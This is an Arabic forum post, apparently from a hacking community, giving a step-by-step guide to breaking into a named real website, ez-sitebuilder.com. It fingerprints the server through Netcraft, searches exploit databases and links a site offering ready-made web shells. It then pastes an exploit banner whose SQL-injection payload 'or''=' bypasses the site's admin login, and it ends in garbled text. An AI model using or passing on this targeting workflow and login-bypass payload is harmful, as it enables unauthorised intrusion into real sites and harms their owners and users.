الان و حصريا ...اقوى اسلحتي لاختراق المواقع
http://www.1337day.com/search موقع البحث عن الثغرات
http://t00ls.org/ موقع شلات جاهزة و ما يلزمها الا التحميل
news.netcraft.com به معلومات عن كل المواقع و السرفرات
http://www.google.com/ طبعا تعرفونه
اليوم فآرنا هو http://www.ez-sitebuilder.com/
نروح لنتكرافت اعلاه ونكتب الموقع"" ez-sitebuilder.com ""هيك في الخانة على اليسار
بيخرجولك مواقع مختلفة مثلا mail.ez-sitebuilder.com
بتختار ez-sitebuilder.com الموقع الاصلي و تظغط على Site Report
اااااوووهه
ثم رح تبحث عن السيرفر 74.50.63.34 Linux -Apache/2.2.8 Ubuntu""""
السيرفر هو Apache/2.2.8 Ubuntu
تمام نروح www.1337day.com
نحط السيرفرApache/2.2.8 Ubuntu
ونبحث عن الثغرات الموجودة به
نختار ثغرة sql او Dork انا لقيت Dork مناسب و هو يتم بابحث العشوائي
/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-
\-/ --------------------------------|------------------------------|
\-/ [+] Exploit Title : AR Infotech Admin Auth ByPass |
\-/ [+] Date : 07 June 2011 |
\-/ [+] Author : xConsoLe` // Thanks to mohsan123 |
\-/ [+] Category : WebApps |
\-/ [+] d0rk : ""Website Developed By: AR Infotech."" |
\-/ [+] Home : http://dzt00ls.tk/ Or http://dztools.net/ |
\-/ [+] Tested on : Windows Xp SP3 |
\-/ ------------------------|--------------------------------------|
/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-/\\-
( ) /\ _ (
\ | ( \ ( \.( ) _____
\ \ \ ` ` ) \ ( ___ / _ \
(_` \+ . x ( .\ \/ \____-----------/ (o) \_
- .- \+ ; ( O \____
Dz 4 ) \_____________ ` \ /
(__ Ever <3 +- .( -'.- <. - _ VVVVVVV VV V\ \/
(_____ ._._: <_ - <- _ (-- _AAAAAAA__A_/ |
. /./.+- . .- / +-- - . \______________//_ \_______
(__ ' /x / x _/ ( \___' \ /
, x / ( ' . / . / | \ /
/ / _/ / + / \/
' (__/ / \
[+] Default admin panel : http://localhost/admin/
[+] ByPass the admin auth by using
Username : 'or''='
Password : 'or''='
حطينا dOork وما راعنا الا الموقع المستهدف هو الاول
ندخل على ez-sitebuilder.com
و نضيف عليه www.ez-sitebuilder.com/site/id/adminlogin.asp
الان الجدار الناري نحط'
Password-Username
الموجودين هنا
http://www.1337day.com/exploits/16261
:didas::didas::didas::eyes::eyes::eyes::eyes::eyes ::bad::bad::bad::bad:
hghk , pwvdh >>>hr,n hsgpjd ghojvhr hgl,hru>>hojvr fhpjvht+hgavp+tHv j[hvf